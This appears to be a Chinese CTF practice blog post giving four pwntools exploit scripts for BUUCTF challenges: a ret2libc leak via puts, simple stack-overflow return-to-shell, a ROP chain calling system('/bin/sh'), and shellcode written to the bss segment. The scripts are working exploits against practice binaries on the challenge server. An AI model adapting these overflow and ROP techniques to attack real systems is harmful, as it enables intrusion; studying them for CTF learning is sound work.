最近在入门堆,但是基础实在有点多,可是不会基础的话又看不懂题,所以堆的题也没怎么搞,只能刷点简单题来水,生活不易啊。

水题:

ret2libc:buu ciscn_2019_en_2

from pwn import *
from LibcSearcher import *

context.os='linux' 
context.arch='amd64' 
context.log_level='debug' 

p = remote('node3.buuoj.cn',26863)
#p = process('./ciscn_2019_en_2')
elf = ELF('./ciscn_2019_en_2')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x400B28
#ROPgadget查找
ret = 0x00400C84
pop_rdi = 0x00400c83 # pop rdi ; ret

p.sendlineafter('choice!\n','1')
#payload = flat(['\0', 'a'*0x57, pop_di, puts_got, puts_plt, main_addr])
payload = 'a'*0x58 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('encrypted\n',payload)
p.recvline()
p.recvline()

#puts_addr = u64(r.recv(8))
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\0'))
#puts_addr= u64(r.recvline()[:-1].ljust(8, '\x00'))
#print(puts_addr)
#print(hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
sys_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

p.sendlineafter('choice!\n','1')
#payload = flat(['\0', 'a'*0x57, ret,  pop_di, binsh_addr, sys_addr])
payload = 'a'*0x58+ p64(ret)+  p64(pop_rdi)+ p64(binsh_addr)+ p64(sys_addr)
p.sendlineafter('encrypted\n',payload)
p.interactive()

bjdctf_2020_babystack

from pwn import*

r=remote('node3.buuoj.cn',26025)
shell_addr=0x4006e6

r.sendline('100')
payload='a'*(0x10+8)+p64(shell_addr)
r.sendline(payload)

r.interactive()

[HarekazeCTF2019]baby_rop

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
#p = process('./babyrop')
p = remote('node3.buuoj.cn',26310)

#0x00400683 : pop rdi ; ret
pop_rdi = 0x00400683
sys_addr = 0x004005E3
bin_sh_addr = 0x00601048

payload = 'a'*0x18 + p64(pop_rdi) + p64(bin_sh_addr) + p64(sys_addr)
p.sendline(payload)
p.interactive()

ciscn_2019_n_5

#coding=utf-8
from pwn import *
context(os='linux',arch='amd64', log_level = 'debug')
#sh = process('./ciscn_2019_n_5')
sh = remote('node3.buuoj.cn',25696)
elf = ELF('./ciscn_2019_n_5')

bss_addr = 0x601080
#shellcode ="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
shellcode = asm(shellcraft.sh())
#生成64位linuxshellcode
payload = 'a'*0x28 + p64(bss_addr)
#栈溢出ret到shellcode执行

sh.sendlineafter("name\n",shellcode)
sh.sendlineafter("me?\n",payload)
sh.interactive()